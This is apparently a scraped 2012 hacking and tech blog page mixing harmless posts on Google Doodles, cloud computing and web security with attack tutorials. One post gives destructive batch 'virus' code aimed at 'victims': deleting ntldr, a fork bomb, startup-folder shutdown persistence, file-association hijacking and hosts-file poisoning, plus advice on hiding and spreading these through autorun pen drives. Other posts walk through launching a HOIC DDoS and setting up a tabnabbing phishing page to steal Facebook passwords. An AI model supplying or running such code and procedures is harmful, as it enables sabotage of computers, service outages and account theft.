This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Thursday 29 March 2012

How To FInd All Google Doodles

Hello Guys,
Today I'm Going to share how to find all Previous and Current Google Doodles .
but first of all if you are a regular reader you might be knowing already about my previous articles about Google Doodles .
Google Doodles celebrates all Holiday and Events in Google style.

so know first of all i'm going to write how i found this Index of Google Doodles.
without using any Google  first open and right click on the Logo or will find a option called View Background Image or View just click on it.
and in this case you will find URL like

so if you Focus on this image link you will find visit this link or
according to this index, the first Google Doodle was :
Burning Man festival on Aug 30, 1998

you can able to collect all previous and current logos from 1998- to the current year .so it was just my stupid research :D share it if you like it .
Enjoy... and

Send Private Self Destructive Message.

Hi frendz,Do you also want to send such self destructive mails which can be read only once?? here follow the steps
2) Click on the button to create a message, and then enter your message. You have up to 1,000 characters.
3) After entering your message and creating a link, you will be presented with a secure URL to copy and send to the recipient. Keep in mind, if you were to visit the link yourself, no one else will be able to view the message. It literally is one view and then gone.
What does it look like on the recipient’s end?

Best Temporery Email Services @ Internet.

People use temporary email services when they are unwilling to reveal their actual email address mainly because they fear spam ( which is a good thing ). Dear friends temporary mails are used as below reasons:

  • It is used for those site which enter the person with email subscription
  • It used for security purpose
  • Its used for fake mails
  • Its used for temporary and not annoy you with their mails
  • Track email through a RSS feed

While there are several disposable email services like: 
  etc, a new web service called Mmmmail lets you enjoy the benefits of disposable email with an additional ability to track email through a RSS feed. Just head over to their website, put a desired nickname for your disposable email address and click on check mmmmail ! You'll presented with a link to rss feed which keeps track of all emails sent to that temporary address. Check it out here and share your views.

Monday 26 March 2012

Apple Tried to Hire Linus Torvalds, Kill Linux

Could you imagine a world without Linux?
Such a thought could have been stark reality had Apple managed to successfully recruit Linus Torvalds back in 2000.
The founder of Linux was invited to Apple HQ in Cupertino by Steve Jobs at the turn of the millennium, where is was invited to join Apple and work on (what would become) OS X.
The lure? ‘Unix for the biggest user base’.
The catch? That he would have to stop development on Linux, a condition that led Torvalds to flatly refuse the offer.
Imagine: no Linux would have meant no Ubuntu, no ChromeOS, and no Android; the entire ecosystem of technology could have been dramatically changed by acceptance of this one job offer.
This revelation isn’t actually new, but as it’s been cropping up on social sites for the last few days I thought we should mention it too.

Friday 23 March 2012

Benefits Of Cloud Computing.

Cloud Computing is an internet-based computer network, where a resource, software and applications are shared to be utilized by other computers connecting to it. This is a whole new form of computing concept. Why is this novel concept referred to as cloud computing? It is because the internet is often visualized as a big cloud consisting of a large network of computers connected to each other.

In essence cloud computing can be defined as a set of computers connected together sharing applications stored on the internet-based server allowing thousands of users from all around the world to access something without having to download and install anything on their own computers. An example of this would be Google Docs.
So what is the big deal about cloud computing? What makes it so fabulous? Here are just a few of the reasons:
  • Savings Through Reduced Energy Usage: Using cloud computing technology the need to maintain room temperatures to cool down servers goes down compared to the old way of computing.
  • Easy Backup & Recovery: Servers that run inside a virtual machine can be stored in one image file containing the entire system configuration and settings. In case a server crashes, you don’t have to scratch from beginning to perform reinstallation and reconfiguration. Simply take a copy of the saved image, restore data from last backup and the server will be back up and running again. You can save time, effort and resources.
  • Easy Deployment: Virtual servers can be cloned as much as possible and can be run on another machine without having to change configuration, hence reducing the workload of IT staff and expediting the process.
  • Maintenance & Management Made Easy: Fewer number of servers will automatically reduce the time and cost to manage servers.
  • Slashing Of Hardware Costs: Companies can cut down on hardware investment because by using cloud computing they do not have to purchase additional servers, peripherals and other network gear.
  • Lesser Space Demands: The fewer the number of servers the less space needed to store the network equipment, the server is placed on a shared server or data center.
  • Hardware Standardization: Hardware virtualization in cloud computing involves emulation and encapsulation so that the process of introduction and removal of a particular hardware can be carried out with ease.
  • Easy Replacement and Upgrading: Replacing or upgrading a server specification can be easier to execute using cloud computing. If the parent server is overloaded and specifications are not sufficient anymore, we can easily upgrade the specification or move a virtual machine to another, more powerful server.

There are plenty of benefits in working with cloud computing, and many outweigh the reasons why not to use cloud computing. Cloud computing is still growing and many government bodies and company organizations already use this type of network for their businesses. This type of computing allows them to focus on what matters and not to worry about technology side of things. Cloud computing does have its place, though it is not for all companies.

What Is Cloud Computing? Explained In Simple Words

I’m sure you’ve heard the following two words being used extensively online in the last couple of years. Cloud Computing. The next time you read something about a service that mentions ‘Cloud’, you will immediately know what they mean by that, and what exactly cloud computing is and how does it work.

What is Cloud Computing and how does it work, explained in simple terms?

Actually, you’ve been using cloud computing all this time, unless you were living in a cave somewhere, and that cave somehow didn’t have an internet connection.

So let me put this in as simple terms as possible:
Cloud Computing is the ability to use the power of other computers (located somewhere else) and their software, via the Internet (or sometimes other networks), without the need to own them. They are being provided to you, as a service.

That means you don’t have to go and buy some super powerful gigantic computer system and risk have it sitting there, doing nothing. By utilizing the cloud, everything is ready for you whenever you might need it. Exactly where the hardware and software is located and how it all works doesn’t matter to you, as a user. It’s just somewhere up in the vast “cloud” that the Internet represents.
Now you know one of the reasons they call it the Cloud Computing.
One good example of someone who provides these types of cloud services would be RackSpace cloud company.

To illustrate the point even better, let’s go over one typical example of cloud computing that you must have used before (exception are those with the cave thing
from above.)

  Google as an example of cloud computing

What happens when you type and search something on Google?
Have you ever thought about this? Does your PC goes through all that information, sorts it out for you and display all the relevant results? No, it doesn’t. Otherwise, you would wait much longer for a simple results page to display. A simple PC can’t process all those billions of websites in a fraction of a second, like Google does. Your PC only serves as a messenger to tell Google what you are looking for. Everything else is done by some of Google’s powerful computers located somewhere, Who-Knows-Where in the world.
Now, did you ever care about how or where that comes from? Why would you, right? Exactly. That’s a great example of how cloud computing is used.

At this point, I’m sure you understand what cloud computing is and the basic idea behind it. If that’s everything you wanted to know, you can stop here, and go enjoy your life knowing what Cloud Computing is. If you are interested in just a little tiny bit more about it, continue reading to the end (not long from here).

3 Types of Cloud Computing 

1. Infrastructure as a Service (IaaS) is basically when you buy raw computing hardware to use over the net, usually servers, or online storage. You buy what you need and pay-as-you-go. The best and the most basic example of this type of cloud computing is buying a web hosting for your website. You pay monthly fee to a hosting company for the storage on their servers and to have them serve up files for your website from those servers.

2. Software as a Service (SaaS) is a case where you use the complete software application that’s running on someone else’s servers. The best example of this is Google Docs, which you can use for creating and storing text documents, presentations, spreadsheets and so on…

3. Platform as a Service (PaaS) is case where you create applications using web-based tools so they run on systems software and hardware provided by another company. As an example, consider a situation where you develop your own e-commerce website but have the whole thing, including the shopping cart, checkout, and payment mechanism running on a merchant’s server.

That should be all you need to know to get you started.

As you can see, the idea behind cloud computing is very powerful and useful beyond measure. Especially now when you actually know what it is.

The Pirate Bay plans Low Orbit Server Drones to beat Censorship

One of the world's largest BitTorrent sites "The Pirate Bay" is going to put servers on GPS-controlled aircraft drones in order to evade authorities who are looking to shut the site down. In a Sunday blog post, The Pirate Bay announced new "Low Orbit Server Stations" that will house the site's servers and files on unmanned, GPS-controlled, aircraft drones.

TPB said:
With the development of GPS controlled drones, far-reaching cheap radio equipment and tiny new computers like the Raspberry Pi, we’re going to experiment with sending out some small drones that will float some kilometers up in the air. This way our machines will have to be shut down with aeroplanes in order to shut down the system. A real act of war.

We’re just starting so we haven’t figured everything out yet. But we can’t limit ourselves to hosting things just on land anymore. These Low Orbit Server Stations (LOSS) are just the first attempt. With modern radio transmitters we can get over 100Mbps per node up to 50km away. For the proxy system we’re building, that’s more than enough.

Low earth orbit is 100 miles up and requires a launch vehicle capable of achieving speeds of 17,000 miles an hour. At “some kilometers up in the air,” these drones would require significant power to stay afloat, and that’s even before the power required to transmit megabits per second over a wireless connection.

The LOSS are already in development, writes the blog from TPB. As you might wish to solve the energy problem, you have not thought about it well. And that will probably be the weak point. In the air it is hardly the drones now at least can fill up with energy. You will need to load them somewhere where they will be charged. By then, the authorities can access and turn off the drones easily.

It seems despite the will of the courts the pirate bay will not be going down without somewhat more of a fight.To learn more about the latest developments in the next generation of quadcopters check out the ted talk by the leader of the leading research group:

7 Ways to Improve Your Network’s Web Security

Admins looking to improve on their company’s web security often turn to software solutions to help assess and automate their security tasks. Good web security software can make surfing the web safe and secure by protecting users from potential vulnerabilities in their operating systems or browsers, as well as helping them to avoid policy violations. The top web security software packages can help you to improve your network’s web security in many ways. Here are seven of the major benefits web security software offers:

1. Automatic blocking of malicious content
Compromised websites can lead to compromised workstations. Whether it’s a malicious script or a media file, web security software can scan and block data before displaying it in a browser compromises a machine.

2. Scan downloads for malware
Users frequently go to the Internet to download files, whether those are programs, music, or screensavers. Web security software can scan those downloads with multiple anti-malware engines to ensure maximum protection for your users.

3. Support acceptable use/appropriate content policies
There’s a time and a place for most things; but many of those things are not appropriate at the workplace. Web security software can proactively block access to websites containing content that is not right for access during working hours, which helps users avoid policy violations or other situations that can impact others.

4. HTTPS inspection
Many times, HTTPS is used to get around filters and proxies because they cannot inspect encrypted traffic. With all the Certificate Authorities that have been compromised in the past few months, this could be a huge risk, but the best web security software can use PKI to scan even HTTPS traffic while still protecting the confidentiality of data.

5. Bandwidth controls prevent impact to mission critical apps
Web security software can also enforce bandwidth limits on users’ browsing, so that your ecommerce site, email system, etc., don’t suffer from slow performance due to Internet access.

6. Block phishing sites
You can read a new story every week about a company that lost data, money, and customer confidence because an employ fell victim to a phishing attack. Web security software can stop these kinds of scams dead in their tracks by blocking access to phishing sites.

7. The exception is the rule
The best web security software should use a combination of lists, categories, reputation, whitelists and blacklists to control Internet access, and easily allow admins to create exceptions when a site may be categorized one way, but is still necessary for a business purpose.

With good web security software, administrators can allow their users safe and secure access to the Internet, while protecting them, the company’s data and reputation, and their customers from the worst the web has to offer. Web security software is the right way to take advantage of the best that Internet access has to offer, while avoiding the worst threats that are out there. Web security software is one of the must-have applications every network admin needs.

This guest post was provided by Casper Manes on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. Learn more on what to include in your web security strategy.

All product and company names herein may be trademarks of their respective owners.

Tuesday 20 March 2012

Batch Files!The Art Of Creating Virus.

Hello Guys,Today lets discuss about how to create our own batch virus and spread itI could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files ?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

2. Folder flooder
@echo off
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3.User account flooder
@echo off
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

5. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo > C:\windows\system32\drivers\etc\hosts //this command prints or add in hosts file.

Replace and with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Viruses we just coded

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write

Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Tuesday 13 March 2012

HOIC - Another DDOS tool by Anonymous

A new DDOS tool is release by Anonymous called high-orbit ion canon or HOIC. This release is only for windows and has a nice GUI. If the attackers. see the home screen of the software. 

There are two round buttons under the target label. Click on the+ sign to add a website to attack and - sign button is used to remove a website. Set the number of threads and increase it to increase the strength of the attack. 

When you click on the+ button, a new window will open where you can specify following things

  • URL - is the target website to attack
  • Power -> sets the request velocity.  
  • Booster - are config scripts that define the dynamic request attributes
HOIC includes a new feature called 'boosters' which are files you download or add to an attack machine which enables the attacker to manipulate headers such as language, referrer, host, etc.

To launch the attack click on "FIRE TEH LAZER!" button.

HOIC uses some randomization techniques to evade the detection.But there are some requests which can be used to detect. This tool is strictly an HTTP DOS attacking tool while LOIC has TCP, UDP and HTTP attack options.

As compared to LOIC, this tool seems to be more complicated. New Boosters script makes it harder to use. Becauase downloading and then configuring Boosters is not so easy. This new tool only focuses on HTTP attack.

How Cross-Site Scripting (XSS) Works.

XSS vulnerabilities (Cross-Site Scripting vulnerabilities) are often overshadowed by their big cousin, the infamous SQL Injection. This does not make them any less effective or deadly. XSS and SQL Injection attacks are similar in the way they inject malicious code. The difference is that an SQL attack, injects code into the target database whereas an XSS attack injects code into the target browser. In an XSS attack the hacker uses your website to inject code into your visitor’s browser.

Once a user is infected, the malicious code can do a variety of things. It can change the color scheme of the page the user is viewing. It can do more nasty things such as replacing images with pornographic content. Using the same techniques, links on the page may be re-written to point to malicious locations. Sometimes clicks can also be forced, simulating user action without his knowledge. Another popular XSS attack reads out the user’s cookie and transmits it to the hacker. This allows him to impersonate the user and hijack his session. If the user happens to be the system administrator, the hacker can take over the entire website.

In this video tutorial I demonstrate what an XSS attack is to show you how a hacker can use XSS vulnerabilities to hack into your website. I start the video by explaining the mechanisms of cross site scripting, and I proceed to demonstrate a number of pranks you can play on unsuspecting users. I also demonstrate how cookies can be stolen to hijack sessions and I take a peek into the vulnerable code that allows such attacks. I hope that this video will both entertaining and educational, and that by learning about XSS you can keep your own website safer.


Monday 12 March 2012

Amazing Funny Google Tricks.

I’m going to show you some funny and amazing tricks that you can do with Google. Most of these tricks use the very famous “I’m Feeling Lucky Button”.
Note: To do most of the tricks below, you must turn off Instant Search first.

Funny and Amazing Google Tricks:

1. Google Gravity

With this cool trick, you’re going to see Google logo and other stuffs on the Google homepage falling down to the bottom of the browser.
Google Gravity Trick
To do this trick, just visit Google Gravity or go to and type in Google Gravity then click I’m Feeling Lucky button.

2. Epic Google

Want to make the font size of the Google homepage excessively bigger? To do so, just go to, type Epic Google and click I’m Feeling Lucky button.

3. Weenie Google

This is the opposite of Epic Google. To try this trick, just go to, type Weenie Google and click I’m Feeling Lucky button.

4. Elgoog

Google homepage written in backwards (Google Mirror). To do this trick, just go to and type in Elgoog then click I’m Feeling Lucky button.

5. Find Chuck Norris

  • Go to
  • Type in “find Chak Noris”
  • Click I’m Feeling Lucky button

Chuck Norris Google Trick
6. French Military Victories? Or did you mean…

To do this trick, go to and type in French Military Victories. Now click I’m Feeling Lucky button and look at the question Did you mean.

7. Google Hacker

Have you ever wondered what will happen to Google homepage if it gets hacked? Try this trick to see the hacked version of Google.
  • Go to
  • Type in Google Hacker and click I’m Feeling Lucky button.
Google Hacker
I never thought that the Jejemon language has already spread all over the world. I thought it’s just here in the Philippines.

8. Play PacMan on Google

I’m sure most of you are already familiar with this trick but for the benefit of our other friends, I’m going to show you how you can play PacMan on Google (single or multiplayer mode).
Play PacMan On Google
  • Go to
  • If you want to play PacMan on single mode, click the Insert Coin button beside Google Search but if you want to play on multiplayer mode, click the Insert Coin button twice.
  • Multiplayer mode controls: Arrow keys and A,S,D,W keys

9. Change background image

With this trick, you can add a custom background image on Google homepage. Find out how by clicking this link: Change Google homepage

10. Google’s different languages

11. Do a Barrel Roll (new!)

This trick has become trending in Twitter and even in Facebook! Among the Google tricks here, this one is my favorite! To see it in action, just go to and search for “Do a Barrel Roll” without the “”.
If you’re kinda lazy, just click this link and I’ll Google it for you.
Thanks to Sivleptcb for the heads up!

12. Tilt

This one is another cool trick which is almost the same as the “Do a Barrel Roll”. Just go to Google and search for “tilt” without the “” to see it in action.
Again, if you’re feeling lazy, just click this link and I’ll Google it for you.
Thanks to Nutle for sending us this tip!
UPDATE: I just learned that aside from “tilt”, you can also use the word “askew” to get the same result.

13. Spam Recipe

Looking for some delicious recipes? Just go to your Gmail and then go to Spam to see the best “Spam Recipes”.

Google - Spam Recipe14. Dragon Slain

Open a Spread Sheet in Google Docs then press Shift+F12. See the message that will appear.

15. Google Sphere

Google Sphere
To do this trick, just visit, type in Google Sphere then click the “I’m feeling lucky” button.
Also see: Annoying Google & Let Me Google That For You
If you know other cool Google tricks, you can share them here by leaving your comments below.

Best Google Doodle Animations

A lot of people have always been fascinated with the cool Google Doodles every time there’s a special occasion like the birthday of famous people, Olympics, and holidays. The first Google Doodle was in honor of the Burning Man Festival on 1998 and from then on, we’ve seen numerous Google logos with playful designs like the cute Sesame Street and Scooby Doo logos.

As years passed by, Google Doodles have evolved from plain images to animated doodles which makes “Googling” more fun and entertaining. Here’s a great list of some of the best animated Google Doodles and the all-time favorites!
Best Google Doodle Animations

1. Jim Henson’s 75th Birthday

2. Lucille Ball’s 100th Birthday

3. Jules Verne’s 187th Birthday

4. Les Paul’s 96th Birthday

5. 160th Anniversary of the First World’s Fair

6. 51st Anniversary of the Human Spaceflight

7. Google Instant – Particle Logo

8. Robert Bunsen’s 200th Birthday

9. Earth Day 2011

10. Charlie Chaplin’s 122nd Birthday


11. Alexander Calder’s 113th Birthday

12. Thomas Edison’s Birthday

13. Pacman’s 30th Anniversary Doodle

14. Nam June Paik’s Birthday

15. Independence Day 2012

Top 3 All-time Favorite Google Doodle Animations
3. Freddie Mercury’s 65th Birthday

2. John Lennon’s 70th Birthday

1. Martha Graham’s 117th Birthday

Sunday 11 March 2012


Hi friends I already posted couple of articles on Phishing.Phishing is the easiest method to hack any kind of account because it doesnt involve any experience of Programming and Hacking.All you need is a bunch of codes(To Create Phishing Pages) and a little common sense on how to trick your victim.

Today I am going to explain one of the new type of Phishing attack called Tabnabbing.
Before reading this article I would strongly recommend you to go through the below articles

How To Hack Gmail By Phishing
How To Hack Facebook By Phishing

What is Tabnabbing?
Tabnabbing also known as ‘Tabnagging‘ and ‘Tabnapping‘ which is a new type of Phishing attack.It works similarly like Phishing but this attack is much more convincing than Phishing.When victim browses on multiple tabs, then one of the tab automatically changes into fake login page when the victim is away from that page.

How It Works?
As stated earlier this attack works when user opens multiple tabs

Initially victim navigates a normal looking page.
When victim switches to another tab, the attacker redirect their site to a phishing page.
When victim came back to attacker page, they’ll see the phishing page.(Victim assumed he open the site previously)
Victim entered their login information and this login information is sent to your server and the phishing page is login successful, so the victim don’t have any clue that their information was hacked.
How To Hack Facebook By Tabnabbing?
1.Basic knowledge on How Phishing works
Read below articles to know how Phishing works:

How To Hack Gmail By Phishing
How To Hack Facebook By Phishing
2.A free web hosting account.
For this I would recommend,, ,,
3.You should have following files which are necessary for Tabnabbing

Facebook.html -Fake Facebook login page (phisher)
login.php - Script which captures the login details of the victim
google.html - Standard google page used to trick the user
tabnabb.js - Java script which is required for tabnabbing
Password is

How To Do Tabnabbing~Procedure:

1.After Downloading upload facebook.html ,login.php & google.html to your webhosting excluding tabnabb.js

2.After uploading these three files then open facebook.html and copy the link of facebook.html.

3.Now open tabnabb.js with notepad and search for Enter your url here.
4.Replace it with the url of facebook.html.

5.Now upload tabnabb.js to your web hosting.
6.I hope that now you have successfully uploaded all the files to your webhosting.

7.Now you have to send google.html link to your victim.
8.To know whether your Tabnabbing is working or not just open google.html and open few tabs and wait for few seconds now your google.html will automatically change into facebook.html fake login page.
9.Now if the victim enters his details into the page then the password is yours.

How To Protect Yourself From Such Attacks?

Always keep your Browser and softwares up to date.
Use a Good Antivirus and Anti Malware.
Always check the url in the address bar while you are logging in into some social networking site.
Never enter your password on suspicious web pages.
Update:If you dont want to Tabnabb and if you want to do only Phishing then just send facebook.html page to the victim.Use for hosting the files.